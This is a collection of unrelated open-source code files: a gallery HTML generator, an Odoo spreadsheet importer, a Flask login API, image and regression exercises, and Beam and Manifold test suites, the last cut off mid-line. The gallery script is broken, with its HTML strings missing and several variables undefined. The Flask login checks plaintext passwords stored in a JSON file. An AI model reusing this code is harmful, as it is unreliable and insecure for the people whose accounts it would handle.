+{"seq_id":"30304812727","text":"#!/usr/bin/env python3\n\n# gallery generator\n# feb. 2, 2023\n# ------------------------------\n# arg 1: gallery dir on os\n# arg 2: dir name on server\n# arg 3: lightbox name on page\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport sys\n\n\n#print ('Number of arguments:', len(sys.argv), 'arguments.')\n#print ('Argument List:', str(sys.argv))\n#print ('1st', str(sys.argv[1]))\n\nGALLERY_DIR = str(sys.argv[1])\nINCLUDE_CAPTIONS = False\nLIGHTBOX_NAME = str(sys.argv[3])\nDIR_NAME = str(sys.argv[2])\n\n\n# --------------------------------------\n\nfile = open( (\"%s/%s.php\" % (GALLERY_DIR, LIGHTBOX_NAME) ), \"w+\")\n\ndir_files = os.listdir(GALLERY_DIR)\nimg_files = []\n\nfor f in dir_files:\n\tif not f.startswith('.'):\n\t\tif not f.startswith(LIGHTBOX_NAME):\n\t\t\timg_files.append(f)\n\n#print(img_files)\n\n# --------------------------------------\n\ncount = 0\nrow_opened = False\n\nfor f in img_files:\n\tname = f.split('.')[0]\n\textension = f.split('.')[1]\n\tlink_url = ('images/%s/%s' % (DIR_NAME, f))\n\tthumb_url = ('images/%s/%s-thumb.%s' % (DIR_NAME, name, extension))\n\n\t#print(link_url)\n\t#print(thumb_url)\n\n\t# --------------------------------------\n\n\trow_line1 = (\"\\r\\n\")\n\tcol_line1 = (\"\\t
\\r\\n\")\n\trow_line2 = (\"
\\r\\n\\r\\n\\r\\n\")\n\n\t# --------------------------------------\n\n\tif count == 4:\n\t\tcount = 0\n\n\tif count == 0:\n\t\tfile.write(row_line1)\n\t\trow_opened = True\n\n\tfile.write(col_line1)\n\tfile.write(fig_line1)\n\tfile.write(link_line1)\n\tfile.write(img_line1)\n\tfile.write(link_line2)\n\tif INCLUDE_CAPTIONS:\n\t\tfile.write(caption_line)\n\telse:\n\t\tfile.write(caption_line_alternate)\n\tfile.write(fig_line2)\n\tfile.write(col_line2)\n\n\tcount = count+1\n\n\tif count == 4:\n\t\tfile.write(row_line2)\n\t\trow_opened = False\n\n\n# can happen if count doesn't reach 4\nif row_opened == True:\n\tfile.write(row_line2)\n\trow_opened = False\n\nfile.close() \n\n# --------------------------------------\n\n","repo_name":"RobotGrrl/lexiconficus","sub_path":"website/gallery_gen.py","file_name":"gallery_gen.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"34885439006","text":"# -*- coding: utf-8 -*-\nfrom odoo import fields, models, api, _, sql_db\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\nfrom odoo.exceptions import UserError\nimport tempfile\nimport base64\nfrom datetime import datetime\nimport xlrd\nfrom xlrd import open_workbook\nimport threading\n\n\nclass MasterCustomImport(models.TransientModel):\n _name = 'master.custom.import'\n\n xls_file = fields.Binary(\"Import\")\n datas_file = fields.Char('Filename')\n\n def import_xls(self):\n datafile = self.xls_file\n file_name = str(self.datas_file)\n if not datafile:\n raise UserError('File Masih Kosong!')\n try:\n book = xlrd.open_workbook(file_contents=base64.decodebytes(self.xls_file))\n except xlrd.XLRDError as e:\n raise UserError('Tolong hanya upload file xlsx saja, Terima Kasih')\n header = {}\n sheet = book.sheet_by_index(0)\n\n #get header\n for col in range(sheet.ncols):\n if sheet.cell_value(0, col) == 'Nama Item':\n header['name'] = col\n elif sheet.cell_value(0, col) == 'Tanggal Mulai Pengerjaan':\n header['tanggal_mulai'] = col\n elif sheet.cell_value(0, col) == 'Nama Komponen':\n header['komponen.name'] = col\n elif sheet.cell_value(0, col) == 'Waktu Pengerjaan Komponen':\n header['komponen.waktu_pengerjaan'] = col\n elif sheet.cell_value(0, col) == 'Tipe Waktu':\n header['komponen.tipe_waktu'] = col\n elif sheet.cell_value(0, col) == 'Bobot Presentase Komponen':\n header['line_ids.percentage'] = col\n\n all_vals = []\n last_item = -1\n for row in range(sheet.nrows):\n if row == 0:\n continue\n vals = {}\n if sheet.cell_value(row, header['name']):\n vals['name'] = sheet.cell_value(row, header['name'])\n if sheet.cell_value(row, header['tanggal_mulai']):\n exceltime = sheet.cell_value(row, header['tanggal_mulai'])\n time_tuple = xlrd.xldate_as_tuple(exceltime, 0)\n date_py = datetime(*time_tuple)\n date_str = date_py.strftime(DEFAULT_SERVER_DATE_FORMAT)\n vals['tanggal_mulai'] = date_str\n\n komponen = self.env['master.komponen'].search(\n [('name', '=', sheet.cell_value(row, header['komponen.name']))])\n komponen = komponen[0] if komponen else False\n\n if not komponen:\n komponen = self.env['master.komponen'].create({\n 'name': sheet.cell_value(row, header['komponen.name']) if header['komponen.name'] else False,\n 'tipe_waktu': sheet.cell_value(row, header['komponen.tipe_waktu']) if header['komponen.tipe_waktu'] else 'hari',\n 'waktu_pengerjaan': sheet.cell_value(row, header['komponen.waktu_pengerjaan']) if header['komponen.waktu_pengerjaan'] else False\n })\n else:\n komponen.write({\n 'tipe_waktu': sheet.cell_value(row, header['komponen.tipe_waktu']) if header['komponen.tipe_waktu'] else komponen.tipe_waktu,\n 'waktu_pengerjaan': int(sheet.cell_value(row, header['komponen.waktu_pengerjaan'])) if header['komponen.waktu_pengerjaan'] else komponen.waktu_pengerjaan,\n })\n\n if vals:\n line_ids = [(0, 0, {\n 'komponen': komponen.id,\n 'percentage': int(sheet.cell_value(row, header['line_ids.percentage'])) * 100 if header['line_ids.percentage'] else 0\n })]\n vals['line_ids'] = line_ids\n last_item += 1\n all_vals.append(vals)\n else:\n vals = all_vals[last_item]\n line_ids = vals.get('line_ids', [])\n line_ids.append((0, 0, {\n 'komponen': komponen.id,\n 'percentage': int(sheet.cell_value(row, header['line_ids.percentage']) * 100 if header['line_ids.percentage'] else 0)\n }))\n vals['line_ids'] = line_ids\n all_vals[last_item] = vals\n\n for rec in all_vals:\n res = self.env['master.item'].create(rec)\n\n action = self.env.ref('wr_pintar_master.action_master_item').read()[0]\n return action\n\n\n\n\n\n\n\n","repo_name":"sharibar/wr_pintar_recruitment","sub_path":"wr_pintar_master/wizard/master_custom_import.py","file_name":"master_custom_import.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7681167724","text":"from flask import request, render_template, jsonify, make_response, abort, Blueprint\nfrom datetime import datetime\nfrom module.function import getUserId\nimport json\nimport uuid\n\napp = Blueprint('user', __name__)\n\n\n# アカウント認証\n@app.route('/user/login', methods=[\"POST\"])\ndef user_login():\n user_id = request.json.get('user_id', None)\n ps = request.json.get('password', None)\n\n # JSON読み込み\n with open('user.json') as f:\n user_data = json.load(f)\n user_list = list(user_data)\n\n session_id = str(uuid.uuid4())\n now_time = datetime.now()\n now = \"{0:%Y-%m-%d %H:%M:%S}\".format(now_time)\n\n for i in range(len(user_list)):\n if user_list[i].get('user_id') == user_id and user_list[i].get('password') == ps:\n # JSON読み込み\n with open('session.json') as f:\n session_data = json.load(f)\n session_list = list(session_data)\n # 追加\n flag = False\n\n for j in range(len(session_list)):\n if session_list[j].get('user_id') == user_id:\n session_list[j]['session_id'] = session_id\n session_list[j]['life_time'] = now\n flag = True\n\n if not flag:\n dic = {'session_id': session_id,\n 'user_id': user_id, 'life_time': now}\n session_list.append(dic)\n\n with open('session.json', 'w') as f:\n json.dump(session_list, f, indent=4, ensure_ascii=False)\n\n response = make_response(jsonify({\"message\": \"Success\"}))\n response.set_cookie(\"session_id\", value=session_id)\n return response\n\n return jsonify({\"message\": \"Error\"})\n\n\n@app.route('/user/logout', methods=[\"POST\"])\ndef user_logout():\n cookie = request.cookies.get('session_id', None)\n\n with open('session.json') as f:\n session_data = json.load(f)\n session_list = list(session_data)\n\n for i in range(len(session_list)):\n if session_list[i].get('session_id') == cookie:\n session_list.remove(session_list[i])\n with open('session.json', 'w') as f:\n json.dump(session_list, f, indent=4, ensure_ascii=False)\n return jsonify({\"message\": \"Success\"})\n\n return jsonify({\"message\": \"Error\"})\n\n\n# セッション認証\n@app.route('/user/session', methods=[\"POST\"])\ndef session():\n cookie = request.cookies.get('session_id', None)\n user_id = getUserId(cookie)\n\n if not user_id is None:\n with open('user.json') as f:\n user_data = json.load(f)\n user_list = list(user_data)\n for i in user_list:\n if i['user_id'] == user_id:\n return jsonify({\n \"user_id\": i['user_id'],\n \"name\": i['name'],\n \"image\": i['image']\n })\n\n return jsonify({\"message\": \"Error\"})\n\n\n# アカウント情報の取得\n@app.route('/user/', methods=[\"POST\", \"GET\"])\ndef account_info(user_id):\n session_id = request.cookies.get('session_id', None)\n session_user_id = getUserId(session_id)\n\n # JSON読み込み\n with open('user.json') as f:\n user_data = json.load(f)\n user_list = list(user_data)\n\n with open('haiku.json') as f:\n haiku_data = json.load(f)\n haiku_list = list(haiku_data)\n\n if request.method == 'GET':\n for i in range(len(user_list)):\n if user_id == user_list[i].get('user_id'):\n return render_template('user.html', user_id=user_id)\n abort(404, description=\"Page Not Found\")\n\n if request.method == 'POST':\n user = {}\n for i in range(len(user_list)):\n if user_id == user_list[i].get('user_id'):\n user = user_list[i]\n\n session_user = {}\n for i in range(len(user_list)):\n if session_user_id == user_list[i].get('user_id'):\n session_user = user_list[i]\n\n haiku = []\n for i in range(len(haiku_list)):\n if user.get('user_id') == haiku_list[i].get('user_id'):\n if not session_user_id is None:\n haiku_list[i]['liked'] = \"True\" if haiku_list[i]['id'] in session_user['favorite'] else \"False\"\n haiku.append(haiku_list[i])\n\n if user == {}:\n return jsonify({\"message\": \"Error\"})\n\n return jsonify({\n \"user_id\": user['user_id'],\n \"name\": user['name'],\n \"image\": user['image'],\n \"haiku\": haiku\n })\n","repo_name":"2020-AIT-OOP2-Group1/Haikutter","sub_path":"router/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1440981081","text":"import cv2\nimport numpy as np\n#Read Image\nimg = cv2.imread('testing.jpg')\n#Display Image\ncv2.imshow('image',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#Applying Grayscale filter to image\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n#Saving filtered image to new file\ncv2.imwrite('graytest.jpg',gray)\n","repo_name":"pratyushmore/computer-vision-course","sub_path":"assign1_convolution/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73201190306","text":"import requests\nimport pandas as pd\nimport scipy\nimport numpy \nimport sys\nfrom sklearn.linear_model import ElasticNet,LinearRegression\n\nTRAIN_DATA_URL = \"https://storage.googleapis.com/kubric-hiring/linreg_train.csv\"\nTEST_DATA_URL = \"https://storage.googleapis.com/kubric-hiring/linreg_test.csv\"\n\n\ndef predict_price(area) -> float:\n \"\"\"\n This method must accept as input an array `area` (represents a list of areas sizes in sq feet) and must return the respective predicted prices (price per sq foot) using the linear regression model that you build.\n\n You can run this program from the command line using `python3 regression.py`.\n \"\"\"\n response = requests.get(TRAIN_DATA_URL)\n train_data=pd.read_csv(TRAIN_DATA_URL,header=None)\n \n train_area=train_data.loc[0]\n train_price=train_data.loc[1]\n train_area=train_area.iloc[1:]\n \n train_price=train_price.iloc[1:]\n train_area=train_area.to_numpy()\n train_price=train_price.to_numpy()\n \n train_area=train_area.reshape((train_area.shape[0],1))\n train_price=train_price.reshape((train_price.shape[0],1))\n \n El=ElasticNet(alpha=0.5,l1_ratio=1,normalize=False)\n El.fit(train_area,train_price)\n area=area.reshape((area.shape[0],1))\n \n return El.predict(area)\n \n ...\n\n\nif __name__ == \"__main__\":\n # DO NOT CHANGE THE FOLLOWING CODE\n from data import validation_data\n areas = numpy.array(list(validation_data.keys()))\n prices = numpy.array(list(validation_data.values()))\n predicted_prices = predict_price(areas)\n rmse = numpy.sqrt(numpy.mean((predicted_prices - prices) ** 2))\n try:\n assert rmse < 170\n except AssertionError:\n print(f\"Root mean squared error is too high - {rmse}. Expected it to be under 170\")\n sys.exit(1)\n print(f\"Success. RMSE = {rmse}\")\n","repo_name":"AVSBharadwaj/Kubrik","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28617252226","text":"from collections import deque\nimport itertools\n\nnums = [1,2,3]\n\n# perm = itertools.permutations(nums)\n\n# s=[]\n# for i in list(perm):\n# s.append(i)\n# print(s)\n\n\nclass Solution:\n def permute(self, nums):\n result = []\n\n # base case\n if len(nums) == 1:\n return [nums.copy()]\n\n for i in range(len(nums)):\n x = nums.pop(0)\n perms = self.permute(nums)\n\n for perm in perms:\n perm.append(x)\n result.extend(perms)\n nums.append(x)\n return result","repo_name":"avisionary/leetcode-solutions","sub_path":"python_codes/46.py","file_name":"46.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9898195818","text":"from __future__ import annotations\n\nfrom pickle import dumps, loads\nfrom urllib.parse import quote\n\nfrom ..market import Market\nfrom . import manifold_vcr, mkt\n\nassert mkt # just need to access it so mypy doesn't complain\n\n\ndef assert_equality(mkt1: Market, mkt2: Market) -> None:\n \"\"\"Ensure that two markets are referring to the same underlying system.\"\"\"\n for attr in dir(mkt2):\n attr1 = getattr(mkt1, attr)\n attr2 = getattr(mkt2, attr)\n if callable(attr1) and callable(attr2):\n continue\n elif attr.startswith('__'):\n continue\n elif attr not in ('client', 'logger', 'market', 'event_emitter'):\n assert attr1 == attr2\n elif attr == 'market':\n assert mkt1.market.id == mkt2.market.id\n\n\ndef test_repr(mkt: Market) -> None:\n \"\"\"Make sure that repr does not error on common cases.\"\"\"\n assert repr(mkt)\n\n\ndef test_get_state(mkt: Market) -> None:\n \"\"\"Make sure that we are not divulging secrets.\"\"\"\n state = mkt.__getstate__()\n assert getattr(state.get('client'), 'api_key', None) is None\n assert 'logger' not in state\n\n\ndef test_pickling(mkt: Market) -> None:\n \"\"\"Make sure Markets can be dumped to disk and reloaded.\"\"\"\n with manifold_vcr.use_cassette(f'test_market/pickle_load/{quote(mkt.id)}.yaml'):\n new_mkt: Market = loads(dumps(mkt))\n assert_equality(mkt, new_mkt)\n\n\ndef test_from_url(mkt: Market) -> None:\n \"\"\"Make sure Markets can be grabbed by URL.\"\"\"\n with manifold_vcr.use_cassette(f'test_market/fetch_by_url/{quote(mkt.id)}.yaml'):\n assert mkt.market.url\n mkt2 = Market.from_url(mkt.market.url)\n assert_equality(mkt, mkt2)\n\n\ndef test_from_id(mkt: Market) -> None:\n \"\"\"Make sure Markets can be grabbed by ID.\"\"\"\n with manifold_vcr.use_cassette(f'test_market/fetch_by_id/{quote(mkt.id)}.yaml'):\n mkt2 = Market.from_id(mkt.id)\n assert_equality(mkt, mkt2)\n","repo_name":"LivInTheLookingGlass/ManifoldMarketManager","sub_path":"ManifoldMarketManager/test/test_market.py","file_name":"test_market.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"12516908130","text":"import time\nimport unittest\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport apache_beam as beam\nfrom apache_beam import coders\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.portability.api import beam_interactive_api_pb2\nfrom apache_beam.runners.interactive import background_caching_job as bcj\nfrom apache_beam.runners.interactive import interactive_beam as ib\nfrom apache_beam.runners.interactive import interactive_environment as ie\nfrom apache_beam.runners.interactive.caching.cacheable import CacheKey\nfrom apache_beam.runners.interactive.interactive_runner import InteractiveRunner\nfrom apache_beam.runners.interactive.options.capture_limiters import Limiter\nfrom apache_beam.runners.interactive.recording_manager import ElementStream\nfrom apache_beam.runners.interactive.recording_manager import Recording\nfrom apache_beam.runners.interactive.recording_manager import RecordingManager\nfrom apache_beam.runners.interactive.testing.test_cache_manager import FileRecordsBuilder\nfrom apache_beam.runners.interactive.testing.test_cache_manager import InMemoryCache\nfrom apache_beam.runners.runner import PipelineState\nfrom apache_beam.testing.test_stream import TestStream\nfrom apache_beam.testing.test_stream import WindowedValueHolder\nfrom apache_beam.transforms.window import GlobalWindow\nfrom apache_beam.utils.timestamp import MIN_TIMESTAMP\nfrom apache_beam.utils.windowed_value import WindowedValue\n\n\nclass MockPipelineResult(beam.runners.runner.PipelineResult):\n \"\"\"Mock class for controlling a PipelineResult.\"\"\"\n def __init__(self):\n self._state = PipelineState.RUNNING\n\n def wait_until_finish(self):\n pass\n\n def set_state(self, state):\n self._state = state\n\n @property\n def state(self):\n return self._state\n\n def cancel(self):\n self._state = PipelineState.CANCELLED\n\n\nclass ElementStreamTest(unittest.TestCase):\n def setUp(self):\n self.cache = InMemoryCache()\n self.p = beam.Pipeline()\n self.pcoll = self.p | beam.Create([])\n self.cache_key = str(CacheKey('pcoll', '', '', ''))\n\n # Create a MockPipelineResult to control the state of a fake run of the\n # pipeline.\n self.mock_result = MockPipelineResult()\n ie.current_env().add_user_pipeline(self.p)\n ie.current_env().set_pipeline_result(self.p, self.mock_result)\n ie.current_env().set_cache_manager(self.cache, self.p)\n\n def test_read(self):\n \"\"\"Test reading and if a stream is done no more elements are returned.\"\"\"\n\n self.mock_result.set_state(PipelineState.DONE)\n self.cache.write(['expected'], 'full', self.cache_key)\n self.cache.save_pcoder(None, 'full', self.cache_key)\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=1, max_duration_secs=1)\n\n self.assertFalse(stream.is_done())\n self.assertEqual(list(stream.read())[0], 'expected')\n self.assertTrue(stream.is_done())\n\n def test_done_if_terminated(self):\n \"\"\"Test that terminating the job sets the stream as done.\"\"\"\n\n self.cache.write(['expected'], 'full', self.cache_key)\n self.cache.save_pcoder(None, 'full', self.cache_key)\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=100, max_duration_secs=10)\n\n self.assertFalse(stream.is_done())\n self.assertEqual(list(stream.read(tail=False))[0], 'expected')\n\n # The limiters were not reached, so the stream is not done yet.\n self.assertFalse(stream.is_done())\n\n self.mock_result.set_state(PipelineState.DONE)\n self.assertEqual(list(stream.read(tail=False))[0], 'expected')\n\n # The underlying pipeline is terminated, so the stream won't yield new\n # elements.\n self.assertTrue(stream.is_done())\n\n def test_read_n(self):\n \"\"\"Test that the stream only reads 'n' elements.\"\"\"\n\n self.mock_result.set_state(PipelineState.DONE)\n self.cache.write(list(range(5)), 'full', self.cache_key)\n self.cache.save_pcoder(None, 'full', self.cache_key)\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=1, max_duration_secs=1)\n self.assertEqual(list(stream.read()), [0])\n self.assertTrue(stream.is_done())\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=2, max_duration_secs=1)\n self.assertEqual(list(stream.read()), [0, 1])\n self.assertTrue(stream.is_done())\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=5, max_duration_secs=1)\n self.assertEqual(list(stream.read()), list(range(5)))\n self.assertTrue(stream.is_done())\n\n # Test that if the user asks for more than in the cache it still returns.\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=10, max_duration_secs=1)\n self.assertEqual(list(stream.read()), list(range(5)))\n self.assertTrue(stream.is_done())\n\n def test_read_duration(self):\n \"\"\"Test that the stream only reads a 'duration' of elements.\"\"\"\n def as_windowed_value(element):\n return WindowedValueHolder(WindowedValue(element, 0, []))\n\n values = (FileRecordsBuilder(tag=self.cache_key)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(0), event_time_secs=0)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(1), event_time_secs=1)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(2), event_time_secs=3)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(3), event_time_secs=4)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(4), event_time_secs=5)\n .build()) # yapf: disable\n\n values = [\n v.recorded_event for v in values\n if isinstance(v, beam_interactive_api_pb2.TestStreamFileRecord)\n ]\n\n self.mock_result.set_state(PipelineState.DONE)\n self.cache.write(values, 'full', self.cache_key)\n self.cache.save_pcoder(coders.FastPrimitivesCoder(), 'full', self.cache_key)\n\n # The following tests a progression of reading different durations from the\n # cache.\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=100, max_duration_secs=1)\n self.assertSequenceEqual([e.value for e in stream.read()], [0])\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=100, max_duration_secs=2)\n self.assertSequenceEqual([e.value for e in stream.read()], [0, 1])\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=100, max_duration_secs=10)\n self.assertSequenceEqual([e.value for e in stream.read()], [0, 1, 2, 3, 4])\n\n\nclass RecordingTest(unittest.TestCase):\n def test_computed(self):\n \"\"\"Tests that a PCollection is marked as computed only in a complete state.\n\n Because the background caching job is now long-lived, repeated runs of a\n PipelineFragment may yield different results for the same PCollection.\n \"\"\"\n\n p = beam.Pipeline(InteractiveRunner())\n elems = p | beam.Create([0, 1, 2])\n\n ib.watch(locals())\n\n # Create a MockPipelineResult to control the state of a fake run of the\n # pipeline.\n mock_result = MockPipelineResult()\n ie.current_env().track_user_pipelines()\n ie.current_env().set_pipeline_result(p, mock_result)\n\n # Create a mock BackgroundCachingJob that will control whether to set the\n # PCollections as computed or not.\n bcj_mock_result = MockPipelineResult()\n background_caching_job = bcj.BackgroundCachingJob(bcj_mock_result, [])\n\n # Create a recording.\n recording = Recording(\n p, [elems], mock_result, max_n=10, max_duration_secs=60)\n\n # The background caching job and the recording isn't done yet so there may\n # be more elements to be recorded.\n self.assertFalse(recording.is_computed())\n self.assertFalse(recording.computed())\n self.assertTrue(recording.uncomputed())\n\n # The recording is finished but the background caching job is not. There\n # may still be more elements to record, or the intermediate PCollection may\n # have stopped caching in an incomplete state, e.g. before a window could\n # fire.\n mock_result.set_state(PipelineState.DONE)\n recording.wait_until_finish()\n\n self.assertFalse(recording.is_computed())\n self.assertFalse(recording.computed())\n self.assertTrue(recording.uncomputed())\n\n # The background caching job finished before we started a recording which\n # is a sure signal that there will be no more elements.\n bcj_mock_result.set_state(PipelineState.DONE)\n ie.current_env().set_background_caching_job(p, background_caching_job)\n recording = Recording(\n p, [elems], mock_result, max_n=10, max_duration_secs=60)\n recording.wait_until_finish()\n\n # There are no more elements and the recording finished, meaning that the\n # intermediate PCollections are in a complete state. They can now be marked\n # as computed.\n self.assertTrue(recording.is_computed())\n self.assertTrue(recording.computed())\n self.assertFalse(recording.uncomputed())\n\n def test_describe(self):\n p = beam.Pipeline(InteractiveRunner())\n numbers = p | 'numbers' >> beam.Create([0, 1, 2])\n letters = p | 'letters' >> beam.Create(['a', 'b', 'c'])\n\n ib.watch(locals())\n\n # Create a MockPipelineResult to control the state of a fake run of the\n # pipeline.\n mock_result = MockPipelineResult()\n ie.current_env().track_user_pipelines()\n ie.current_env().set_pipeline_result(p, mock_result)\n\n cache_manager = InMemoryCache()\n ie.current_env().set_cache_manager(cache_manager, p)\n\n # Create a recording with an arbitrary start time.\n recording = Recording(\n p, [numbers, letters], mock_result, max_n=10, max_duration_secs=60)\n\n # Get the cache key of the stream and write something to cache. This is\n # so that a pipeline doesn't have to run in the test.\n numbers_stream = recording.stream(numbers)\n cache_manager.write([0, 1, 2], 'full', numbers_stream.cache_key)\n cache_manager.save_pcoder(None, 'full', numbers_stream.cache_key)\n\n letters_stream = recording.stream(letters)\n cache_manager.write(['a', 'b', 'c'], 'full', letters_stream.cache_key)\n cache_manager.save_pcoder(None, 'full', letters_stream.cache_key)\n\n # Get the description.\n description = recording.describe()\n size = description['size']\n\n self.assertEqual(\n size,\n cache_manager.size('full', numbers_stream.cache_key) +\n cache_manager.size('full', letters_stream.cache_key))\n\n\nclass RecordingManagerTest(unittest.TestCase):\n def test_basic_execution(self):\n \"\"\"A basic pipeline to be used as a smoke test.\"\"\"\n\n # Create the pipeline that will emit 0, 1, 2.\n p = beam.Pipeline(InteractiveRunner())\n numbers = p | 'numbers' >> beam.Create([0, 1, 2])\n letters = p | 'letters' >> beam.Create(['a', 'b', 'c'])\n\n # Watch the pipeline and PCollections. This is normally done in a notebook\n # environment automatically, but we have to do it manually here.\n ib.watch(locals())\n ie.current_env().track_user_pipelines()\n\n # Create the recording objects. By calling `record` a new PipelineFragment\n # is started to compute the given PCollections and cache to disk.\n rm = RecordingManager(p)\n numbers_recording = rm.record([numbers], max_n=3, max_duration=500)\n numbers_stream = numbers_recording.stream(numbers)\n numbers_recording.wait_until_finish()\n\n # Once the pipeline fragment completes, we can read from the stream and know\n # that all elements were written to cache.\n elems = list(numbers_stream.read())\n expected_elems = [\n WindowedValue(i, MIN_TIMESTAMP, [GlobalWindow()]) for i in range(3)\n ]\n self.assertListEqual(elems, expected_elems)\n\n # Make an extra recording and test the description.\n letters_recording = rm.record([letters], max_n=3, max_duration=500)\n letters_recording.wait_until_finish()\n\n self.assertEqual(\n rm.describe()['size'],\n numbers_recording.describe()['size'] +\n letters_recording.describe()['size'])\n\n rm.cancel()\n\n def test_duration_parsing(self):\n p = beam.Pipeline(InteractiveRunner())\n elems = p | beam.Create([0, 1, 2])\n\n # Watch the pipeline and PCollections. This is normally done in a notebook\n # environment automatically, but we have to do it manually here.\n ib.watch(locals())\n ie.current_env().track_user_pipelines()\n\n # Create the recording objects.\n rm = RecordingManager(p)\n recording = rm.record([elems], max_n=3, max_duration='500s')\n recording.wait_until_finish()\n\n # Assert that the duration was parsed correctly to integer seconds.\n self.assertEqual(recording.describe()['duration'], 500)\n\n def test_cancel_stops_recording(self):\n # Add the TestStream so that it can be cached.\n ib.options.recordable_sources.add(TestStream)\n\n p = beam.Pipeline(\n InteractiveRunner(), options=PipelineOptions(streaming=True))\n elems = (\n p\n | TestStream().advance_watermark_to(0).advance_processing_time(\n 1).add_elements(list(range(10))).advance_processing_time(1))\n squares = elems | beam.Map(lambda x: x**2)\n\n # Watch the local scope for Interactive Beam so that referenced PCollections\n # will be cached.\n ib.watch(locals())\n\n # This is normally done in the interactive_utils when a transform is\n # applied but needs an IPython environment. So we manually run this here.\n ie.current_env().track_user_pipelines()\n\n class SemaphoreLimiter(Limiter):\n def __init__(self):\n self.triggered = False\n\n def is_triggered(self):\n return self.triggered\n\n # Get the recording then the BackgroundCachingJob.\n semaphore_limiter = SemaphoreLimiter()\n rm = RecordingManager(p, test_limiters=[semaphore_limiter])\n rm.record([squares], max_n=10, max_duration=500)\n\n # The BackgroundCachingJob is still waiting for more elements, so it isn't\n # done yet.\n bcj = ie.current_env().get_background_caching_job(p)\n self.assertFalse(bcj.is_done())\n\n # Assert that something was read and that the BackgroundCachingJob was\n # sucessfully stopped.\n # self.assertTrue(list(recording.stream(squares).read()))\n semaphore_limiter.triggered = True\n rm.cancel()\n self.assertTrue(bcj.is_done())\n\n def test_recording_manager_clears_cache(self):\n \"\"\"Tests that the RecordingManager clears the cache before recording.\n\n A job may have incomplete PCollections when the job terminates. Clearing the\n cache ensures that correct results are computed every run.\n \"\"\"\n # Add the TestStream so that it can be cached.\n ib.options.recordable_sources.add(TestStream)\n p = beam.Pipeline(\n InteractiveRunner(), options=PipelineOptions(streaming=True))\n elems = (\n p\n | TestStream().advance_watermark_to(0).advance_processing_time(\n 1).add_elements(list(range(10))).advance_processing_time(1))\n squares = elems | beam.Map(lambda x: x**2)\n\n # Watch the local scope for Interactive Beam so that referenced PCollections\n # will be cached.\n ib.watch(locals())\n\n # This is normally done in the interactive_utils when a transform is\n # applied but needs an IPython environment. So we manually run this here.\n ie.current_env().track_user_pipelines()\n\n # Do the first recording to get the timestamp of the first time the fragment\n # was run.\n rm = RecordingManager(p)\n\n # Set up a mock for the Cache's clear function which will be used to clear\n # uncomputed PCollections.\n rm._clear_pcolls = MagicMock()\n rm.record([squares], max_n=1, max_duration=500)\n rm.cancel()\n\n # Assert that the cache cleared the PCollection.\n rm._clear_pcolls.assert_any_call(\n unittest.mock.ANY,\n # elems is unbounded source populated by the background job, thus not\n # cleared.\n {CacheKey.from_pcoll('squares', squares).to_str()})\n\n def test_clear(self):\n p1 = beam.Pipeline(InteractiveRunner())\n elems_1 = p1 | 'elems 1' >> beam.Create([0, 1, 2])\n\n ib.watch(locals())\n ie.current_env().track_user_pipelines()\n\n recording_manager = RecordingManager(p1)\n recording = recording_manager.record([elems_1], max_n=3, max_duration=500)\n recording.wait_until_finish()\n record_describe = recording_manager.describe()\n self.assertGreater(record_describe['size'], 0)\n recording_manager.clear()\n self.assertEqual(recording_manager.describe()['size'], 0)\n\n def test_clear_specific_pipeline(self):\n \"\"\"Tests that clear can empty the cache for a specific pipeline.\"\"\"\n\n # Create two pipelines so we can check that clearing the cache won't clear\n # all defined pipelines.\n p1 = beam.Pipeline(InteractiveRunner())\n elems_1 = p1 | 'elems 1' >> beam.Create([0, 1, 2])\n\n p2 = beam.Pipeline(InteractiveRunner())\n elems_2 = p2 | 'elems 2' >> beam.Create([0, 1, 2])\n\n # Watch the pipeline and PCollections. This is normally done in a notebook\n # environment automatically, but we have to do it manually here.\n ib.watch(locals())\n ie.current_env().track_user_pipelines()\n\n # Create the recording objects. By calling `record` a new PipelineFragment\n # is started to compute the given PCollections and cache to disk.\n rm_1 = RecordingManager(p1)\n recording = rm_1.record([elems_1], max_n=3, max_duration=500)\n recording.wait_until_finish()\n\n rm_2 = RecordingManager(p2)\n recording = rm_2.record([elems_2], max_n=3, max_duration=500)\n recording.wait_until_finish()\n # Assert that clearing only one recording clears that recording.\n if rm_1.describe()['state'] == 